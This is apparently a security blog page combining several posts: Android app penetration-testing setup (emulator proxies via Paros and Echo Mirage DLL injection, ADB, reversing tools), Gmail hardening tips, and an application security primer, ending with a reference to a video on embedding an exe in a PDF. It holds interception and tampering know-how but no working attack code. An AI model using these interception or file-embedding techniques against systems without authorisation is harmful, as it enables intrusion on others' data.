With industry reporting so many new android exploits and malwares, it is becoming a tedious job for developers to secure their applicaitons. With nearly all IT companies having expertise in Web penetration Testing solutions, they have started building solutions for Mobile Penetration testing. But whats the need of creating a different solution for mobile apps testing? Isn’t it same as web applicaiton testing? If you consider ‘Thin client’ mobile apps, the answer is yes. For thin client mobile apps, penetration testing is almost same as that of Web application testing. But If you consider ‘Thick Client’ or ‘Native Mobile Apps’ which gets installed into the device, the penetration testers have to add some more test cases and the testing environment needs a bit of tweak.
If we compare Web penetration Testing and Mobile PT, what exactly is the difference?? One of the major difference is that the user in the case of Web applicaitons do not have access to the files of application (php,asp,jsp files) whereas in the case of mobile, user has access to the application as it is installed in the device itself. All of the platforms provide some kind of databases for those applicaitons to store data(SqlLite3 in Andoid). In case of web, applicaitons only have privilages to store data temporarily using cookies or cache. One more major drawback with mobile apps is that they can be reversed very easily, whether it’s a dex(android), jar/jad(j2me) or a sis(Symbian).
For Penetration testing of Android Application we have to mainly consider the following things ;-

* Settings up the PT lab/Environment.
In this you will learn about how to setup the test environment using emulator,proxy tools. Using these proxy tools you can force emulator to pass the traffic via a proxy. But this setting only works for browser inside the emulator. For apps to work with proxy you need some different environment setting which is discussed in detail. Click here to read more..

* Using debugging tools like ADB,DDMS.
Using debugging tool like ADB you can run commands on emulator and device itself to perform any kind on action. You can get the shell,view the files stored, databases,install new apps, uninstall apps,pull and push files from the device. DDMS in just a GUI version of ADB. To get more detail about all this click here.

* Reversing Apps.
One of the major drawbacks with Mobile apps is that they can be Reversed. We have many opensource tools for reversing android apps like apktool,baksmali,dex2jar. Click here to read more about this.

Thanks for Watching.. Next article will be on “Deep Dive into Android Malwares”
Njoy!!

* A client, which runs on your development machine. You can invoke a client from a shell by issuing an adb command. Other Android tools such as the ADT plugin and DDMS also create adb clients.
* A server, which runs as a background process on your development machine. The server manages communication between the client and the adb daemon running on an emulator or device.
* A daemon, which runs as a background process on each emulator or device instance.
Source: developers.android.com
To view the Best available description about ADB visit http://developer.android.com/guide/developing/tools/adb.html.
To see how adb can be helpful for Penetration testing of Android apps watch the video embedded below.

.
.

.
.

Hope you enjoyed it!!
We’ll upload some more tutorials for dex2jar and apktool pretty soon!!

Have you ever gave a thought what will it be like, if our Gmail or Google accounts password is compromised?? For a person like me who keeps backup of all important document, research papers, links, photos (the ones you cannot keep on home computer too ) and nearly everything on the Google cloud. Most of us have no idea where and in what form my data is stored there but still I trust Google more then my personal laptop. We use so many applications like Gmail, Google docs, Picasa, Orkut but hey all share your same Google accounts password, and if that gets compromised it’ll be like tsunami for us, and with the number of hackers (including the ethical ones ) growing in this world, the probability of it becomes pretty high. People can hack using a
network level attack, or using a poor password recovery options or if you think you are too intelligent to use your vehicle name or girlfriend/boyfriend name as password, your hacker friend will not take much time to prove that you a ‘@#$#@$’.
Well coming to the point, “How to make your Gmail and Google accounts more secure”. There is no special trick or hack to do so. It’s just that Google has provided you many features and options to do so; you have to use them in right way. Here is the check list of options you should use, to insure that your google accounts is safe enough.

1.) Use a secure connection when signing in – Google uses https by default but to make sure that Google uses https always, use the
“Always use https” option in “Browser connection:” under “General” Tab in Settings of your Gmail.

This will make sure that your user credentials are passed in encrypted form which will prevent network level attacks.

2.) Change your password regularly – With ’123456′ as the most commonly used password in this world you should start using a combination of numbers,characters, and case-sensitive letters for your password and avoid dictionary words. (Even if your dear one’s name is not there in dictionary avoid using such passwords )

3.) Update your account recovery options – Make sure that your Recovery email address is correct and you are still using it. It’s
really important as I have seen a case where a person’s recovery email id was never used and expired, which was available for anyone to take. Make sure to add your mobile number as Google can send you a recovery code via SMS, which can very handy. Last recovery option is the ‘Secret Question’ which is only available if you have not signed in during past 24 hours. The answer to the security question should be hard for others to guess, so better choose a difficult secret question and make sure you yourself remember the password .

4.) Turn on 2-step verification - This option adds up one more factor of authentication (Two factor authentication) to your Google accounts. Two factor authentication implies the use of two independent means of evidence to assert an entity, rather than two iterations of the same means. Usually “Something one knows”, “something one has”, and “something one is” are useful simple summaries of three independent factors. For 2-step verification Google uses a verification code which is time specific. If you Turn on this option for your Google accounts, each time you try to login, a Google verification code will be asked(You can remember it for a computer). The next question may be how to get this verification code?? The answer is that Google provides many ways to get this verification code. You can install a mobile application to access this code, or Google can send you a SMS containing the code, and the last option is that you can print some static codes and keep then someplace accessible, like your wallet. You can turn on 2-step verification using this link “https://www.Google.com/accounts/b/0/SmsAuthConfig”. Try to subscribe to all the ways from which you can get your verification code as not all are accessible everytime. For example there may be a case where in you have subscribed to SMS as a way of accessing verification code, in this case if you forget to take your mobile somewhere you will not be able to access your google account.

5.) Keep monitoring your account details – Check the lists of websites that are authorized to access your Google account data. Go to My Account > Authorizing applications and sites. You’ll see the list of all third-party sites you’ve granted access to. If you see a website to which you think you have not granted the access, immediately revoke the access for that site. Second thing you should monitor is the ‘Last Account Activity’. At the bottom right of your page you’ll see ‘Last account activity’ with a link for details. By clicking on that link you can monitor, how many sessions are presently open with Access type, location and time of access.

Don’t forget to visit Google security tips and Gmail security checklist from Google for further information.
Reference :
Google security tips : http://www.google.com/help/security/index.html
Gmail Security Checklist : https://mail.google.com/support/bin/static.py?page=checklist.cs&tab=29488
Two-Factor Aunthentication from Wikipedia

In some of the previous posts(http://hakers.info/site/2011/08/setting-up-proxy-for-android-emulator/) we saw how to setup a proxy for android emulator using settings available in emulator itself. The problem with that approach is that it works only for the browser, it does not work with the apps installed inside the emulator. As I couldn’t find any solution for this problem in android emulator I thought of finding a work around to perform this task. One workaround I found is that we should use the base machine itself to capture the packets which emulator (the apps in emulator) is sending.

We can use many network analyzer tools like wireshark etc to capture and analyze the packets but using these tools you can only capture the packets, there is no option to tamper the packets at runtime. If there is a requirement in which you just have to capture the packets and analyze them wireshark will suffice the needs. But if you want to tamper the request and response(which we normally do using Paros/fiddler in web applications) you need to have a tool which can capture network packets and has a capability to intercept and tamper them.

One of these tools I can suggest is Echo Mirage by BindShell which has nearly all of the features we need. It uses DLL injection and function hooking techniques to redirect network related function calls so that data transmitted and received by local applications can be observed and modified. Using these techniques this tools gives you an advantage that it will attach itself to a particular ‘exe’, due to this packets of only a particular exe are captured(in case of wireshark we have to use filter as it captures each and every packet with goes out of the machine).

To setup a proxy using Echo Mirage use the steps given below:

1.)    Download latest version of Echo Mirage.

Latest version of Echo Mirage can be downloaded from:

http://www.bindshell.net/tools/Echo Mirage.html

2.)    Open Echo Mirage and emulator.

3.)    After both the applications are running, using Echo Mirage we need to inject into emulator.exe. To do so click on second tab on Echo Mirage (inject into process). Enter the process name emulator.exe or click on select process to select emulator.exe and click on start.

4.)    If everything works fine you will get a window like this.

5.) Echo Mirage is now ready to trap and intercept all your requests which are sent through emulator.exe.  The screenshot of interceptor below was taken when I tried to open maps application in emulator after setting up Echo Mirage.

You can watch this video to see how to use paros and echomirage to setup the proxy for android emulator or devices.

Hope this article was helpful to you and will further help you in penetration testing of android apps.

Please comment if you have some questions or you want some more clarifications.

This article will tell you the steps you need to follow to set up the proxy for android applications using emulator.  For this you require three basic things i.e “Machine Connected to internet”,”Android SDK”,”Proxy Tools (Paros, Fiddler, Burpsuit etc)”. If we are ready with all these software, the first step is to setup the proxy server using any of these tools like paros, fiddler, burpsuit etc. I’ll show you how to do it with paros.

In paros go to Tool>>Options>>Local proxy and enter the address(127.0.0.1 for localhost) and port number(e.g. 8080) on which you want your proxy server should listen. Please refer to the screenshot below for the options page in paros.

Android Proxy Paros Settings

If your machine is using a outgoing proxy server for accessing internet, you can enter these settings (including authentication details) in connection tab as shown below. Click on OK to save your setting and your proxy server is configured to listen on the address and port number you just mentioned.

Android Proxy Paros outgoing proxy settings

The next step is to make some changes in emulator so that it sends all http requests to the proxy server we have just configured. The simplest method to do it is by changing the APN settings in the emulator. To change the APN settings in emulator, start the emulator and  go to Settings>>Wireless and networks>>Mobile networks>>Access Point Names and click on the APN name you are using (By default it’s Telkila). In ‘proxy’ and ‘port’ option you have to enter the address and port on which your proxy server is listening. So under proxy ideally we should write 127.0.0.1, and it should point to the localhost of the base machine, but in case of android emulator this ip will be localhost for emulator itself. To resolve this issue android emulator has some hardcoded ip addresses which will do this work for us. If we have to access base machine’s localhost the ip we have to use is 10.0.2.2. So under proxy mention “10.0.2.2” and under port mention the port number which you mentioned in proxy server (port 8080 in my case). Save your settings and your proxy setup is done.

Android Emulator Proxy Settings

Now if you try to open a website in emulator’s browser, proxy tool will be able to catch those requests. Now you can tamper any request and response and test your android app.

Google on Android Browser

Tampering Request using Paros

NOTE : Using this proxy environment you can only trap requests from emulator’s browser. I could not find a way through which you can trap requests going through apps installed in emulator. But you can use a alternate method to do so. My next article on ““setting-up-proxy-for-apps-in-android-emulator” will help you to do so.

You can watch this video to see how to use paros and echomirage to setup the proxy for android emulator or devices.

Despite of so many categories for security, two entities are always involved i.e. Asset and Threat. In all scenarios the “asset” has to be protected from the “threat”. Considering our home security, we all lock our doors before going out. Here home is  the asset and threat is the thieves. If the thief is intelligent enough he will gather all our information like at what time the home is usually vacant, how many people live there, or what kind of lock you have applied. This all information will help him to breach your home security.
Similarly in the IT security world, asset may be the data flowing through Network, data stored on a Server, or a Database and threats are the hackers. Same as thieves  the hackers first step is “Information Gathering”.
With Reference to information security we can divide security into categories like Application Security, data security, Network
Security and others. In this article we will focus more on the Basics of Application Security.
‘Wiki’ says Application security encompasses measures taken throughout the application’s life-cycle to prevent exceptions in the security policy of an application or the underlying system (vulnerabilities) through flaws in the design, development, deployment, upgrade, or maintenance of the application. In simple words it comprises the security issues involved in any type of application, including but not limited to java, PHP, C++, and python.

Application Security Trends
The world of internet is growing in tremendous way with IPv4 addresses getting depleted. With growth in number of users, sophistication in technology, the attack vectors have also increased. The graph below shows the study by SANS institute, depicting the growth in the number of attack vectors in first half of year 2010.

Thus, with the increasing sophistication and numbers, of attacks and defense techniques, it has become a cat and mouse game.

The attacks earlier focused on the Operating Systems themselves. However, with a continuous effort and improvement  on the Operating Systems, the vulnerabilities are difficult to find in them, hence resulting in the shift of the fulcrum from the Operating System to the targeted applications. The graph below shows the trend for four popular applications, i.e. Adobe reader, Ms Word, Ms Excel and Ms Power point. If you look at the Adobe, you will see that the vulnerabilities increased drastically for year 2010.

So, it can be said that the two sides of the application security, both good and bad, are in a constant state of evolution.

The malicious guy comes in: THE HACKER
There might be some guys with the malicious intent, who might be looking to compromise your assets. They might be technology geeks, freaks and motivated hackers, attacking your applications just for fun, or for profit. Many times, they are also funded by high profile companies or even governments to target the sensitive data and assets of companies or countries they are in competition. Well known Stuxnet worm and the Aurora attacks are just a few examples; of this; however, there might be many attacks that go unnoticed by the governments and the organizations.

These attackers try to gather as much information as possible for the target. This will involve a lot of searching on the search engines, news groups, job sites, your own site, public forums, social networks like facebook, myspace, orkut etc. A lot of information can be harvested in this manner which can be later misused to breach security. This information includes email ids, date of birth, likings and disliking, girl friends and boyfriends, the software used in the company, location and much more. A popular quote in the hacking world says “Deterministic hackers spend 90% of their time in information gathering phase, rest 10% is spent on the breach”.
Knowing the threats: Build your walls strong enough
The assets need to be secured from the threats. However, for securing the assets, there needs to be a proper knowledge on the boundaries of the application from which input comes. In other simple words, the first rule of security is “the user input MUST not be trusted”. So, for securing the application, the application castle should be strong enough to stop the malicious input on the walls itself. This approach is called as input validation. The other approach is that even if the enemy enters the castle, don’t let them go away, or cripple them. This approach is termed as output validation. These threats can come from any input, which may include a form field, url, cookies, post parameters etc. These inputs should not be trusted in any manner, as this “trust” is what leads to the compromise.

Deeply understanding the threats: Ohh… they are so many
The attack techniques have evolved over time, and there are many ways in which the applications can be compromised. The attacks can be following but not limited to:
•    Cross site scripting
•    SQL injection
•    Buffer overflows
•    Cross site request forgery
•    XPATH injection
•    Format string attacks
•    Heap overflows
•    Redirection attacks
•    Authentication attacks
•    Authorization attacks
•    Canonicalization attacks
•    OS commanding
•    SSI includes
•    Parameter pollution
•    Session based attacks
•    Sniffing
•    Spoofing
•    Phishing
These are only a few examples. Many more exist and the list keeps on getting updated on a regular basis. A simple Google search on “Cross site scripting” or any of these will give you thousands of results, which are enough to explain the vulnerability. There are many security projects(OWASP) and institutes(SANS) working to create freely-available articles, methodologies, documentation, tools, and technologies to provide unbiased, practical, cost-effective information about application. These communities also release a list of the top vulnerabilities at regular interval of time.
Save Me Please
For each of the vulnerabilities, there exist different ways to mitigate them. However, speaking in a generic manner, all the vulnerabilities can be prevented by proper validations, both on input and output. If only one of these is done, this vulnerability can surely be exploited by an attacker. So, it is always better to have a two way defense mechanism, which acts as a double shield to prevent the attacks against the application. When the development of a application is done, an approach that ensure both these validations at the same time should be followed. This is the best possible solution to mitigate the attacks. As far as targeted application like Acrobat Reader or Microsoft applications are concerned the only way to save yourself, is to have updates which are, released by the vendors. Even if you miss a single update your machine is vulnerable to any type of attack. Presently there are many tools to prevent applications from getting hacked but at the end it’s in the hands of the application developer to make his application secure enough and not only checks if all the doors are locked but ensure that every other entry point is also locked and secured.
Conclusion
Thus, we can conclude that the threats on the applications are on a continuous rise, and developers need to be aware of these and educate themselves so as to involve a secure methodology in the lifecycle of the development. These vulnerabilities are large in number, and hence require a thorough study.

Video for embedding exe in a pdf file